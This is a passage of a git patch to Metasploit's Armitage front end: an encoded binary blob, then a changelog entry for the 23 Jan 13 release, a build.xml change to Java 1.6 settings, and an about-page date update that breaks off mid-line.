zMx<fF9KQv8P<jX|_Tu>ispG+>L!G8UMor5Q6n**Nt05@tJVCZ$Km)cffS}WZz(s6a z<k>V-e9;2ff5sOUfMUr35Nl}|>Q#mi3gH@oGR;L1l;DRDo{FM`Q&EWfd<5dc#ZU<8 zbEx=G0wvsh4y~tVBvC^9bI9v=vd?Mx*u)^kD72q=oA(=`MC_Q)Cs7(?Ftk3X8wG4( ze2)<nX7K;ox(=`?lBO-QN?6j8L6D??z_L4-1r-n@Ce+WYi0M?ooW%g<!-#=0N6cb4 zb53{anE>ONQSr<Qo)H!Px2I=UM*n@zTk7rV>guZMo}TKS+5auZy-CxH@c-oVWOqsL zOVcl+wG|gRk$2J1J!u$z03+sD%_ZE7T)fF7IMLWkn5Gl&abi%ushVzHf<0H}am4E~ zt}nIojm36+SuELA{ZwJCPyZUZ)O6`Ggw%gk3h~O;M+>c98xaed^V-yu-)Aq*Mi0Ke z;bopV=yBb*(0uMiME7e}W>sh`t0QE6;l$%FrViBE9m8l|4z35gzjOHccT)}3Ze<u< z7gT1YmoNu1a<MYWDMu!`ST0S-#gzMucIIM@@!p1EPULY#A8nFA@mJ*J@!Tue`58i6 zuju`xoNF-IzP3jmb0M;n6%0ucd}pSH(_2F&&#S03gTk)LyT9>_en;c3>is1l51Sm) zy+T4X0YcahSQ$Q<sReZMsy;wUbG~Gi?8)q!Oov_rU4>eJ_F?-ipE5OFiXkNJ7a=i0 zW|S0U=0@AE$(iM&sH>WwHKWy9Gk0m`lk}*%H$1uvHYM0eW~Ck<$mhD;ZnNuXcN+CI z(CLisOIe^LJqG3d7uXyYdG(7PEwBkPuqO1dxgqOO;Rf``u5CsIwawgue{3>K=Qr!$ zTd}U%2}mNSq*P}YO}rtivl$|UjS<xPCg!_aH}v+BvEDFrcoauHQ6%**;5Xl?T_Etq zFRDGH*qgGzu{Tk5Xd_;A3#v*2PXIM3qPsU`m!*u>mE8qvFM&Aa4jz^*|LFatN-_VS z(k}YVK+grOn%&Bbwzo3FZs2t}%UxsHj`{yUmH@SsvSw3(p|0C4$XZI(Z^^RbK&zIw z!`*8;GuK~CH@I#>ryQj1hyIe~KSalG>8nWQSarPOo@BH;2Yv80#2mgeQ!y>v)`v<= z?pJ#r>W<udo0@pMM8PzT;&01GFQ(ttH<WsueOq5&`or;#K3e*t^BoykW%wiC@JHZX zeFJGL&a3?s`>r(duD*`c<b22U9c(*u(=WE&K)HA2{ukYaJ!X*eJ(-TU2YU=oH=}v! z|BpSMr!HTz7vcsWl$0hepw$q;AM><X+;u5s-_tu`Z}-VPxo=kY(a=V!d|%$X9iG=# z+Z3WKe-RZxgYL`W@pQ(bw?na$lu++ytF5O!_hrd<AXycYZAP&<W{zb2K<_UNpiukY zYUr@xu?`1R+!PkCn<Md-r-9fYk*quZ0hC)yOCIP$rMf=rcKt6O8<tV%<c||8%%y{G zno-J4GpCF^xvFg*s!pTeJbgu}>ZrE08=Xdzb+I>v|BRo^)XDis!sMGd(18JR-E>xW zBxRwl<gs~;FKpU^O{GTIK=U!yWX<a6ZJu6~cAf^=zY4B|m|TFERPH^x6j4DQu3eEu zW@gm&q1;H~LpFxX(0zQ<I{Z)S@k#t)(vj{x)axYL=8;4PJ(B4zpjDx2b4s!>ccVD9 zxh1W5q_>i~82R1$@LjmA4!WtFtj}0V6<n!(vEE+d{m-kz#)0rc3ARd<Ubv?*r#BjN ztQQ{3n$~*^O(!|i&d0d5-|lQ~E$wJZmKl9u|G6z_?g;j0y%m=6q#cj-dZ`Z&S$$Jq zR^N#n^5rQfFdsb|LJjlvI!U7;F>f}k#T3yQhE{4nAHSKMqBD1;ZTa&2cM^3~gYesj zfW4?VUslxm3E<h)&1q$Iz-%ckwcm-s9UGZb|3>B&=<~nwymYH?tx5M_t{c!_IcRFp z@h5V$x@RWoS3#p?Ha}0&F)hrgOA9!`3j(EfbpN6quXg4*vjy1L&dNWQ-Ry($&PJ7T z8@DaZ`&Zt^J%PF=@9FNp@-W=>a_atXs8IOJ*5DAT_*C8+Z1ohC)>GnBeURjhVZqT2 z{y=ZeA;6U(c#`&jiF<=p+D6}>BHfM)D@8nmcMgoD;-^?qWnVWlm3A4WkS-}4S+g0G z2!fR=D!jXV9GN^vdiU%zeR-+r8a^q>{lTWg=u|dcIpew9a>#SEe4d&<*M~?R_vjJ# zDgt(G{L7y7(`n}Pc^aG*@=|tI?#uEGzd-);Ut&9+9z2&<FE%gGz(NXoAse+bXd!<k z1;4=ZSF_4oP0L=$zS_cyF0UoKml&A$Ug#aAUYxHuyzmlY@IQE5xgm?2m6x*B>%2r& z*UhAP1%oBO)H_PHYH1RCDg$0-POGZ0RoN|^wZ;~6+*2Kw54D(<+{<#ohUpQEKIKu4 zmt^}&UtJPPHOplVgDyug@dPM@HaftBI#J>Qb4STak}sFPf@;ObN%I<s1OF3f&uG9Q z?`pblgopzC(<($Yz#0$xbu1QIyhi=%ms$M)O1f<BEa@w$VqNc9^kq2rI)+M+qJB^g z<M*fd9CK4Dc`X~*<_$ze-r-tCzR`P0Qr^AUV6gyJVh4Zp3MrNE8d<Gq^&9zk)Nv-o z{JycslD@r>=K#C6D0=YBSX7P*o}1&)=3Dv1LtDo;YctW58T=WdXzK6h%1Tbu!f+<x zBolhzrLx>Sqd-<aEV@<XV9c1~oPR!oaOah>jv2)l=<TJTiW@h=u>$&AAK_bBp~xIc zFVNSNF3vME+x>}s)&iW*Dl9Umk|Of}(iF<J^eTi_pUr6wzNtf@d<b_4D3kd#yHLI~ z90RRtuE7}}jfGa)xsXN~t*o?`u;TrKV{6`u=BGGFyzUhHPFD5%liY$PP<0tpRZdl% zDD|B@s&>6YJNG;-sKC?0i{8AGuRhJ4rd;WTSY3%&Rh}@3_mOyAXntS$>T~+}vf-w< zRz5&LDVM(AaWcv-(87)FwDMVX_J3%uHjXZ}&|8!~7Reui%0;R0T~9qeVKAuP%hwjS z_do|#;b^n>@(|6*dbDyoB4RgssGOs;)j8`zuu21AD-+;QlcV<_R&r8y*(WzvQ|<?x zsVb<&%ltmbO@@C!jdNifEeNwPBi-M6E2-MTKXL|brzlo!TOH0Y;%~Xy1y*f-J&t~d zFlm@rZvHfS12kO@O_lRdpGeL+I}$B4|0uVxXW#b3OxpDxEkxIs89vIg+^e3;*a}(f z1ea2lR|C#^9jsEXUw(u#LL-LyQqU*83y<GT4ep=9Aj*Psb&3F*Pw}7hbtR1t*8BD~ z21ZQ```M$bn=^TiWPeVy4`z3ACAuw<Iyk=^1`<vn8b6t--u*1(bJ}eNji7V~k<ZG5 z7p+d&C`YAojXs{DKI<z<S{|FYc&Qb%?1u}ca%tFsrhL{%nJl6+pY>k;OoRA(HL6TU zyQlCE(Q5o;rY;&`QD(rf-}L1DP40cv#;42oVfgri5hKX>$xLlZQD5|4QsW-_3JH!d zPe-i%lp2Q6#4oajt^Wx6kO~t`u3M%I<`3g1Gj%wf`XWDb@Zt-iJ#a0eeY1rtc^By& zq(SU`W8?A_aN<pvp^~vCTY;LalX(54IZWd15!W{V3V33`FDiKRGG)2Piu8UGZ_k6L z7QRN$CjN2>F0(=6bs_h!@`NjXMRWx0qZVKFl_Z~sKi~6Z6&kq%rIa0NbAZypB{lK4 z)_(G5T<Fxe&?z0`cL+z}Pgpq7oiFlOFJeu!I!i9!<U_k*-(Zft7cA&|F6M;8)kQuh zqyQGCUZfS@^m<8^m0{ES-i4R62q>j0COP!#o2>BC^NTxdheawwY2}K~?iPvPWt+US z3O$q$S!TbiqTb)Kpk{d%9@NdC$eQm^#O^U2`z{}UOUku79?J|5n<z)y&BqzV`pS~F zXB}3w8-_Ub!}O=T7wP_lniOLLNq9+bi*ZfeUW^o4-YZ757e2n{;D8dG?3i0*K^sf- zEmXgKv!Ek_I$)8fh?K9ICJLg{qV8h2(Ad)Ox7nftVilp9l|<7@d$pP@O~C!efg{aL z#4sVijT0+O#0El%O!W6w+fcI<<d?iH#Ih9Vqb{8@d{kbp@1wS&*(y;(7QPCGQ|^qR zjWDbNXS`QYttlnWTqTwl`g-!R+A6V@s<W4xcKYE_2}r{k2$4+6iq4d+5=CK9C?gsR z7i&;@IUIS9D=XF(+-q?ntE^Z{C>PF&fl*NB*(8=rbb`{s(F&dN>o6{7Y89>akZ$=n z*ZGDDuE`OMtC5h=oO8b|Csq??b*5A^(T(bviZz6@T{tn<RIDyocVk2)dSMDZdc|?# zZf~_U+ewg(*T)RKy^E)r%*5`3Uk_gUs~IZv=*fxfez0~|bM$;gFOFCy0NDXVb*HzQ zLKD@scrG2@@DvLAQly30Tjh}`75UR83sF>MC#%V1n%a?SPg2{Gn-#oLRV|iRZJj9L zS{kQ@xNcJ<%88Dt#V}Qe>2e)gOR=6RWTs3}x<P{f0(I#_Q4eOx98DLf9hgA5i)k4O zw&-~>TULhJj+&n`umxH{pHB1T!p>G=wCZbynp&?=`_P!#2ET1tqY&0>naqD_4a{n5 zjZT=Yl%ZH_v8Jl`TA5mDEjCa+-T;A5)$nr`+V=J|wC!O7FSOr61va89#oCBb!mBJs zcvAO0=!?Xd15$|D&EWQe+kVa)Z;NrU@KA<Ebf>Z>4Xk;#VD&l%w3ASLQYsvH4nEUs z(BM1`3eWyUJ5j2de^FMb_=?(zm20T69qe#ESH{QM!43g8W$K0<Jn{avM7dL+hZs29 zJPe&^V~>iP?#YE|_K3}|d33^FY@<5-SWR{>)H>D^4Rw60u%X>^snDHfI$*HfdIf{M zSNqXR2gJ?R*Ak_r7)O}4eW6^o+))fwsXoYB4f+a;{xGJM6ZB|WBo{_Fi4iL2Vl|~Y ziHSl_YijKx>S>3QXiY)RP%+1uBXga_7Qz8nBcUc27mR|`@(k%Ne62`5T;ZJaE@HR| z^5iZUabB)sq|i`g1#JbJYK+l^F1ccsdmGM)F7+*)=>fB9mxh+5Cn-lHPZ@VgLom#9 z!{AD&PixAHp;XYs(uKS#po(L81jVL?9M(0rbmVYAD}|)ICX8W-;MJTnHgp#wOuEqO z@?sU*?=IFAmf(;%6YSN=AfcHD1pm{H!*N{=@DT>bcjT}|1@tYeD<@VAwp3HyUX~iJ z!Qnm%4Tg6w#r3@c%(xw=VOW#nJwdo6aN;{7)(@0Ryu|v#?oo8oOB^ixH<p1SrMO@Q z9ODfw9!%lp+2#$l>S>%X^FeQlXLF*Pk62F_pU#QPzM?thth6jgAIZ{|a(rOVfCb7j zGxGI?XSyy{!qzm?7u?gf7~x1^$X?P^#5B7Ox3d+Y(!h!cgxtflsiN3am3`Eb{Qk5I zBF{>wclk8MR1zDjdOftHgHJ7eDHf;jsnK&wM=ZMdCo@&`*pfOux2(jEDV*@b^zY(_ zUcP!vRsF<vLT)~#`HBA%UO%BcKe4%L*i%a?Y=>Ki`>!prb?T4EpYcqF{(EC7@5f4V zcKajN{R`#7C;nnxRopw73Jbve)8apga;CHZF;aE2NTwbKV2(K=P;O<hJVjQ<mDar+ zC(<mfY$?tU@i)fGs&vR!F=Y&Gg|%kv+nKCw@Wk2J5=@MeCcOgDBPcGFEeeFi+BkFK zsE3s$6$HXsPs(#7*2l_<>IDHA?9GvsAhC|H)Rz<2g2bwVuRkZeg2f17MF1zvbyhfv z)dtFC1f#i)fgC;;jOHGPaiV3El>?>J1y8sZJWK0vcz_m{$E0XZ9M&SPmN(>tQwXk= z^BQsDYjf1b;TXABqgyF#5ZaX1gkb6LQTq0vzOh!;?6{W9t<#~w9?iI<cpY3?xs{R7 z&|Mu?3`g5?q;h8~8#-GNY6f;ywDG7NXK2yY%APZ1=plB0Hx8fEi`7l;&@Me@k46br z-t5w=p@t$@?k7?YQS2yq4PoD2bX!E1UytNOXef*-jAMi+O$kNG0sOETBZ6nZKON&C z<wGc>Buyu~Du~J}vv~2eDwrix=5yk96;#wN=7d-kh6`W8iS6s)Q>i~|szOThbsRpv z*-FhXpHh^3U}fbq$*vk&__CgN3GdBpA~ZP4i5;h{Jh}U<s)P5~84lO0E;bbo=5S(F zb&O8BZX}$@tDUtOZMlH4Cp8mT162cWm0}oNLkty6?i&$DO3Ak}l@|HDibaXS3#UGF z){qh_53bHw3+vLup{j~{gu@4`EUdAhnPv!q1vSy~Z3|ZBMkTJ+7L;2P(^k5@5pkrt zwOHgkbL2q<YiC+q3)&5FF(S3t947ZgTN@Iqxf#oxXk=}~(WI&zDX49&Db<b7;R-Ex zA&0;;0asZn9|lbdkPR>*Bg4d+LfN_;ITr@szKh^Qd?Rb=jsl?-j`sg<%HXcTs+R0K z_-A{Y)B(@Pw!93ccA@SJ8PS0w8|sKLLj5j`2>RLXRqBE<d=o2kqs`l`-I%q5gtYw} z`Fzycju}it|1!o8$2ja>53_=Jf)gvxSX-BJL8r3{6WE`ms3<JWlh0avQ{?|3>0LcY z>U4_3$Ie@uQsoFtKkfcBB5s^<T?81N&v1C+MQc|Me`Rp&Sq=wBiVX#?o1B<&4_5mz zC;kx$#+vt8Ss;CiM3nb>#E4|U>J|GAqh;^l{T~yEXMI#y`i_;=##^myOxg8BL%%b) z@Ee0eC^8yLmlTzaITih7h`LW;P#r8|v%t>MfmY{R;}E{e#*QX5)R=OWdqsm`gH0)h zP0_d>^tIzij*AVRF=4ieXaL5^4o294O5E_!t)#{#R_5tks_bP0F-rB;wG@)*1#U@F zazk(*akrtlK{h^g5Hpmjb|r}l;`4-mBQT5$u)$=22b#M#604dVrl>}kkwU83Skci& zxbD@hCKvArvr&_#F`!OiGISvlkTl~AYYa&vBV~MBW3ig5ToaipX^i=D7Cme%dS|q= zv84DWh%T4^(X1w72f?}%J!vAgRJrxEp+WtiW{0LIefAsW;hVCWVpKlv%ZNV0{r>Db zkOs$~BS%whD0H)JMe=Tji}`s5=_dbxqE+js{h-V#y%`uL%#)#~&7fbCg)&v4g{Y=x z&BZFJri)5LS<S^5Rm_qfP?+l7F_{|Q0=|1%$(HL79}Go)#E^4K7^6?%k3u!Yx5Vv~ z7%W34TH;P*SjZ0s3+m{H3wqO5s5m;cG+s2_)`nKMg4IXQm2fQ;EwXhh)tYZCDm5j! zFfmqarh2nNrUqx)Rw%`4-x{oU)=Gs{=x|3w+YkngeJ??HoTkXunGUsv2i}-dR3|+7 z{IxZP`D#l}6x(a;sAn7aWTBN2@u!?Ns8HF~h+usGi!-~@b)aTj44e&qyiB9jIMMjF z;678ABVq%M7u{pX=XxB$bMaO*u%SkZ;UFP6(#U8@s~d4xLz#^=r7s2DqBz%yE*e{U z_di@NA4HcznzsXTy-_KoWebf)9#ZWUl6u6J;=0`)?Oo~yGilqS8|~W}%WzZ8V8?hx z<x8E647SuL9=b@&xQ=}kTz1_{ai#SEm*k1o9ni#)p}fq03@nAigBse%VAD|?9z0&- z!_~Iv2>9PI9F9%Vc=M(b7(5gCPv$#t+tId;$cJcB8B&QXJHZf1c!NhLEK>fO%D(;R zL?>`OTF5!PI^(Y6^m6La86z%b6$c0I!uG-4I7Fyr7s&sx#R$8w*woNa1|P}daP>Wg zE_FGn=(yuyD(otHkVRLlS`v?OqH9;EbRQ3&bQLR5>=_tbvc~nUkf=M&;8<Y|9!Fut z@!g>5>kGVM+!gMeAffdojyT0(Nqzn@C&I65Txez-BI`j8M`CXp98&Y4La&0`Mg|Kq z3^)xneXQUT?s2Z)yNfM_>-RbFp*ybFuU>Pa+j~RD`^95ay)M*XZDNOs^)s9)EfUW# zeB4JFFNtT9NRdPZP=721g{CTs>LFI9(><^(z#WaI7yQ`F-p-mld!j4t?KpD6#V&|` zXUGKXKr$X6j#M7(igNL%5uE2Z`k{b^<|B>9qKIq`%MLlZa=(Hlf(;=~e0OkE=p z8Jq0P>1%I@ceun$=UfFM<<5HaLGmK;6N5Xd#)sHbZhJdFGWiYD=aZ`T6x!O}pSu2r z<iMR6i4y6=Z<xJmj+Qy?`-1b!44Fy-C0yM{tNTJ)qkI|l?k84PeJ<y~Wse6X><ggK z0SLhJ{b2B()j4q~+yQ6z`$Ny2wK(D);b2R*o*1smsr?Z}%j)nl(`W}g(zU>_s=La{ zUc~USatW|^_12tN-NC_{%=Z|C3`qdvR2&dy?H6=)KrYV2Amk(~3+%+p7It^QoAAz{ zOp^#B^^W6kc5l2$qgx`h{20%XRf$*zUhBn)hy<v7-gp=1kOYb53B0Uf5^k8^ByytD zPzP7qnFKlU!#Q$ctb+r4YEfRNIt@V8QKMK{D`9d5%^QexNx^alU-HypkX~fPWtK^B z#z5R~zSzqC_NBOi2%8F7jOZkU?&S4W?t@xC*1)3=IF!!xh5q5NpofhEEj{31PmB9P zgTaH)<?s7w-XO7;YU&|}1?e^}WIb5qd-~dWkE%N&|9uhvl-d5YBMy{z$^o<0U^$CF zaj=LND;%ZegT;zcUi@-Qw>IOkjq*GGDL3f8Ho;4Cu(JGbu*hFvVL1eKcg1qF&JdBm zA0h4Y_)C8x^F9dadu4+E$T7ys-|Mu5)!loN_6-sFu5`HDn{7>t@xlf(lQKBSV*KEw z*e&`nMD&q%$J~aZTEl;+#!!*Jk*6C2rd6l0LuHPY3^-PU4i6RiJ1!<<Zna&gH!btL zy6I2b5_M~m$uN=cqpT6t%`1fnW$M=vezIA)zSMA-$lp$tFbu-GETrkfME+`{%?xnK zr8C3i=3g*iz&J7+F8WGaFHdL8)GS4B^l*l9GooQ|MOq$O(OvuVp~OvnyAFGSD(t|D zawp40OX<T!{(hh0;b^H^2)U1tfv6FpyDF<zC5nx#<ot_JUCeK8so3oshAkka&_rii z0~wO{_aztJSt6K}S!`+YlNr2xDSw1)28)qs=|v@fnyvLO{o)?J9UO~NA>}m<7%AKK zZdQ)i3Y(2<(5`Z0C^v(48MqQxG|Rp9s7#sOZ-0)P|E*wL4rD$`<gb`;y?e$a4SP3< z=#O%nyJrf8jS_<-%hw4zR>vGiRqDg+%F`YG(*miG0zGKWD3QNR>+mS_Xy{xC_M*?D zM1Gp<-wWN-;xG!Pw)=T7^jj?PVjp6(Xe*gcxcWIS7bj`d!DW65;F8@mV6^BXam{d< z>v96y?UAj1-gd$x-rGlu{9RwUqhZ3rJM_i?*o^`3^%d#H$TmGS==r>3*lM*!2bE)7 z^`3@~5q-O|P1Yovka!ntEpEl0F;p{tGE@Ki6li?c58m*l8<zBQ6!wj@f9?z;S3qh{ zx#?O1hiS)%o>G4f`mTRB5yQM=?9bb{W35OxR^;yiYB?6_`&XjGu_AvLSsDWl2GB-u z#4$}B@?-z~1MYn6^K)xAbU{W<2lN>@V%Yzq>!yz}yLUoK7yZu>wl9o)ljXUhX)+pJ z+Khfn7QH3q=Ztr0xewj@fWtV-Ip;uo+K?;{>GQ1Gs^0W8SswHj;{Z@1`HzzYw_w1` zWJ(w(`)@V_HmA^*aq@`CX28JN^lF?u(8fBvetQPi4S?3l?Z;>7q#rLU7?|Mm*aDhu z3Hy1Q{yx#5@v=VY<00I6D{UVy2ibdf?|<2LZ^yu&jp?+5-i{YNdoz=J^eDO*hmaVA zf68GQe&mPAhm9N<(reIw0sV*Th7TD0bC4{*ysu><B5Ny-BPqLa=?H~Pkj)W00SflJ zKm#Voll`KcLnbAd4Z^VvkMJ~pGE-BsY1;&`g5;h7XXi}mkIRq^;!8PYZF@q`C*WSZ z$?G5*q7HVU1{1LeD)UCB=1#=E&C5cWdOA@ISGE2qQ?pBgY}xi_km}MG1A7WqK&`&X z)cq8(hU!wWM7fea73-nqCe&jA)_uvTxR586<;2BQtYUCXNGd5m2}BtiPSkb@#^&i- zcFW=xT>8$b*p@TYbPKkjoJm+*9Jk}h=kmc=bxsCy!jU80CnL#Qf~*;9c>83C&qh*= z5v!&k{jaGQY)a}WsPNjo6s+?Lwxl=)CwUs-aG{&Gk-)*sz+iK}>FPZLxATjG6*^Ax z<*f6jie}VwDi$l1{ESGLFfqVLn9*@D*o@vzMQeCUSkg_LhMR_{5Kg2_Ll+WoE{JKJ z&4>x1oba3uwnf!AF^~~iIOoIIj!nlJ)uuHk%x0k59&wz=8wRzz&A|QeeHn@WU9_b= zjAuqX=aG<{{;)3I#}Xv`)zb(!68iKu61J2z0QSDcc)s^BinpeKG-Qp7`Wg{iN=d^V z)5ZiN;>_P2AzAL}2!-WxlZ;%}q@M}3W)3Qaq|HRnQiqg6@@7JI*054YtywTd7o@P6 zDbQhSS~Lssw|X>3Ql_J4Z)ZWr*~z7l#<Q_ZZ#=<>xKY+@^eigHh-j#IHfoifY(#LP zU=~6}dJ%@ynIUtqU`?CK8KkCj=D^@T7|hdyHPm&cs21K$FU3`EF1q#XcaF>>sH|In z|Mi;-4T@)$g7?jZmL2985qI*O2cCWNjEFTQ%|rjkFW`ve@MFu7$H7x)*xY8pdUKV+ z<R>$XtY+k%j$kdfh9O>*l#W2TAQQ*Zv3qtKDSB2?VLk$}BQmgzShg$Jk<#WvkCH7M zxjr8TkILdi@B(;f@lHmx6?*KJITnaD@KVV51)?`;7lOO}NnWtzJlr#HA%t!Ciz9ay zqW<sa$Ziqx|MxF)aQY&+q9j}9SOjhIu5hAS27;#Bbxy3l5C43g#j+9^aE<OJhaY7i zXW)8^5uT(jWY2*!!*nFv>;`=ZrdGwlm84UP9N*0FO=Yw+*h=e6cL`HrGnGVDqI!!l z3vMl^r5qb=0M)~(QC??;t+w>-$52y=!<!x~M(t7NKPWS5umqFkM0IKCf`itIb}oVF z&sJLUcGdb&@e)-0Y9mp4N?eMvYj$$k!KJuGMI9>e(E3S7Ww{bA6}6?OPLuK!u}o|( zti`KpS0Jsic^UlM-GdXW{Ir&&oomp)$X`)4zXIoKwj92y=);MX%Q2Prsl<to%VGEU zKu)Z#qE(lg9{a3-@jnH#vi}LMbeu<93k?>pfTtgXG6b<4t~D*CeV3Imd*fPKN{Z5Y zQj95XQzbWT04_`jqrt1thx;orbn1n3LbnQj-Cvgx&4uwzNV6K@d7?EQppqO@unKp4 zkxd!gNvPVK7pJYpa9Q7y6Zxxg6-$c69YQC(e<ETHlw041j;%qI&Rhdy4QR`V4uYl~ z`}U$5YcX6Nb)|l5aRd8j935PX%<$cwS~5w}`tr+HoptENtUh>laiG?lL&>8QvC(Is zmeNMSanj}P4&(oGh!$6V^x7<0>&Ww=QrE*WQD{CwDy+o$X95z$WGc?Y7Rs?q4APug zjA*V}Iva2E$v~rc0b!8pC22{sM(ak6*>E_$9)kL>)>2fKwmcQB7wfA$G9{`i<!k`M zqzz!`uu*0>xB&}=4O=D3jjT2xub|xshEKb-<Z%>T9dr(Lk{OhEP)qYp!Fue}FL&4l zhL63drB&C#s@?>v{&|gRY!ah|f*aIhGv?`en=r9yZyO0ydb|nt{(O%iZlvD~JI{H@ z2-rEFgBLc#bGc8c^%kh(u>})?>q|z&2&RQpxCH@qU<+b0<v&Km3Z@^p^oU}NEljN% z8om{#yYY#`wk9DKw0$dd^ZCk=w_7psBo=cbY#Rc9go=i2L+p6tJ;mD)eDO9Rru1eT z>TI)S2#&*KA=lQ~!ARf;cotND<z_@o>2(%V4D~9746cl}yKNVPOm0$c7TY1*4s+!C zahA(^lz!L_b1d>VA}(Zm750tafslR|V1)6uh#hDTo|4qb-vK#&bevdOGX&3Q?u53c zRX7q64kV2suGKhlVJFNusRl*uMrRI3gxIlS4IPRKDLs*7*5VBJqCy;K+kP;l?Sd&y z>u@-tVTcW{cZ<Olktp8{C&o7p(U9jKXf3WjN0v3imV#7&SxZF&QyX%I{eQs4hnsN1 zayR_Z2d7nc!^TgWQTlFdtH-orv@?C(E!HyWM}>dj@0`8Z?%LiNvghuFZZEqiWM6MX zKKn!;%IX}VrlWfhAye9O<nQiyN2=FJRH?HUdZ%{g@R+@rRp!NU;_hBV?VTQsXf2HF z&l-249YfKUWT;L1Q1N>Lhi~meGHm|<P85s`@h4X{OnU4GPuD?4*pW8uhtKv8myz+X zdhvdk>Fr1gI)IDj)=@O^fY^*Z+;Z^%&Xcqs7edKXLjrlWOPUy3AB4=06KTz1+~cPl zM7!B3oX9zd9P^%3PP|NmXRxf(P=iCLuy_)Ovu6UvdR{~64DL3W!zT{mx*9Zv6V`{} ziuXSV3+jCs%{-XOikk^G)9KA&oNB3)j)m*e5FgSq)Av7uk^gK<2wCq5@gfUz!xX+3 zxDcL2xkoTjzt~M)N8!>N$7s+|v7yNU8h8|5yl@n;8*rXsc<=gESlHu`VMeKW4E3ku z$EH}>i5n>UG22W>nJWBB2*uwCait^2F!$BC8A4t1LMqV9HBjop!;sRK=Dq)f(CvpI zzTESDjzjXZdz5+{r{ogz*ta9yIgZFncuaODFmkIEQnwRuez^~{6SQjd=MegS0`u+d zBD}lQLgz%2vazCwT_u*I(I-VW)wnV`hI_NuiXicM5+n9c6UsY@x+esw$cc(9b!v97 zFi7=4rK8Y_kTTasXGKd-;XqEiaz7wnvOEp09i~4ZOPYBQ_8NE^{XXO*;T7ncrw;GU zW2^-(GNk?!v%FP#iK<9{4>CC8R;aGDJx*7aMce)*n$n>^aXzRx=m%6o)upyfb^8k; zajz~d{tI3C6sseT&gkWj)vnVS*m6H!pM3@avZxbHID-JG)<s91dh0y+6#SmCSj3U$ zEKVrC@6NtmDdjBoKKJ$1(Vax_WuL`R7~hA!o<;5OemaUDq6=ad9PFbc(6V#5BK$Rg zUY&z$1`VcKe~V32vqtM^SE|m7kI99T75$qqRw{I$cT43%>1iz%r%b{9^G5vhGTukC zL+Kxrb>u!3onkM>k`iK-biESn@l?qJ+*9MMx$%>kx__LG?oLIcC59&>)6e6Uy<947 zKMyw`TR?XhVDmeDJ})Odye<G3HJb)s#QZpIl>E>}5<_Rt<>=ZAB7c<QAVYhmbM!4x z>HfZPE4S1U$Z-xwwpgiq@B+?S=c3H2TGM@aE#w($;HgCAgNgSRGS*;8$CVe+Ozb*3 zd{L|{_1OGw>koC%;~?asmC4tT4LWMIL+4Ijmqh*^*&7>{d0#|EtqrWB<Xy9cnq875 zx}Qv1mJEIGL#mQ%{dOIl-w%m9AW>>vuUmKM8v0iNekE_mT{;?nNcU^%*DI$?hhE5t ze1<)g59RdUO%*ST{GspWmyxafeo99zE+WX-xd^GfnjcMG_C<S*(VjAOfALQQ_+=K5 zm*w6r>RhXJC~}9rkzG<gdzy5HzFrms0$GZv#kDiu70}Z#*iZSG$hB;p;rH38;4i(i z<j}Rz*Y9<O2}dB=t7P}SMyc6y@<(0f`Pu<cF%5#1Tw8C_2?N)E+YWd?fUFd_L&??n zHkBB-tQNd>+5@gHzi_p?PxW%-7C$A_*--;6vV^HpR;@=g-oW+q&(9miM`r4Zd^(aN zr!w#6AjUesq%S#g+TAM`K)`FNlPjn8E>x-P!k!bEhZdD-t1oY8qJisC^-$A|;M(yE z*WU$n%D`1)`LrbV?0hb4rIfYq9hJKxR+JuY;y)f7dPQ^+dVioMSLDQH(iMbBoi92{ z!yi(FyqSBd);To#5+apZ<H<!jI%BB#f>j*<O-JTeMIWi6^y8(dG#h#-^L$|?I*Pd} zXCjlX!WJ*_QqpT!2(G>=@+YZkBtJB}j8@%Yer3A;or<%*04p288P`z1s2m5YUE?6d zFjT<%U6|AfK&4<?k@2B$K2-V&m6TFF)r>WW=MYQ(Y^A}Y_|8myVa2$dtMXs5{5i3C z=jo2G>^bgqj1lEr8K=>cU3t93*f{RYFFkuU1AWUz*eiKQI!U~)wCTFYA0krxlAl7K zFgJ<Uh1MOBUygkDFP}L(!1E6O0u;OtJjm|`Zui*4-0cRebF~7Ey&>nCS23WGHyycw zoG9ZcU;q{g);C4|e&{dP-<zgDU<Upv^WJ|1QLCFG->O*u&+Vww;LyQ!)$wikWTy7Q zdoFK^(UO6W_35|vG!ohEkVjW`ehhA=ZsNS{>=kl<8pcFd9|vL4u$6K?99@MX{t+un z+9v!1ZMD^CIsmDKc<tjM?A0Y6sHU6~3#(D~Kk_!;oIuMlYY-0h&_&6GM+lv6iTuR} r#vf6`Q$Na__lw$iLwmH|#W}WFIry<mnQLXQm2EoDq)h(^J*fW!6m5(L diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt index 5ea39884dd68..c1e03e579b70 100755 --- a/data/armitage/whatsnew.txt +++ b/data/armitage/whatsnew.txt @@ -1,6 +1,32 @@ Armitage Changelog ================== +23 Jan 13 (tested against msf 16351) +--------- +- Added helpers to set EXE::Custom and EXE::Template options. +- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts +- Cleaned up Armitage -> SOCKS Proxy job management code. The code to + check if a proxy server is up was deadlock prone. Removed it. +- Starting SOCKS Proxy module now opens a tab displaying the module + start process. An event is posted to the event log too. +- Created an option helper to select credentials for SMBUser, SMBPass, + USERNAME, and PASSWORD. +- Added a feature to label hosts. A label will show up in its own column + in table view or below all info in graph view. Any team member may + change a label through [host] -> host -> Set Label. You may also use + dynamic workspaces to show hosts with certain labels attached. +- Fixed bad things happening when connecting Armitage to 'localhost' and + not '127.0.0.1'. +- Screenshots and Webcam shots are now centered in their tab. +- Added an alternate .bat file to start msfrpcd on Windows in the + Metasploit 4.5 installer's environment. +- Added a color-style for [!] warning messages + +Cortana Updates (for scripters) +-------- +- &handler function now works as advertised. +- Cortana now avoids use of core.setg + 4 Jan 13 (tested against msf 16252) -------- - Added a helper to set REXE option diff --git a/external/source/armitage/build.xml b/external/source/armitage/build.xml index b9d4ca043e54..f5bac934dc80 100644 --- a/external/source/armitage/build.xml +++ b/external/source/armitage/build.xml @@ -16,6 +16,8 @@ depend="yes" debug="true" optimize="yes" + target="1.6" + source="1.6" includeantruntime="fuckno" > <classpath path="./lib/jgraphx.jar;./lib/sleep.jar;./lib/msgpack-0.5.1-devel.jar;./lib/postgresql-9.1-901.jdbc4.jar" /> diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html index 85c4fe5dbb98..e19056effad4 100644 --- a/external/source/armitage/resources/about.html +++ b/external/source/armitage/resources/about.html @@ -3,7 +3,7 @@ <center><h1>Armitage 1.45</h1></center> <p>An attack management tool for Metasploit® - <br />Release: 4 Jan 13</p> + <br />Release: 23 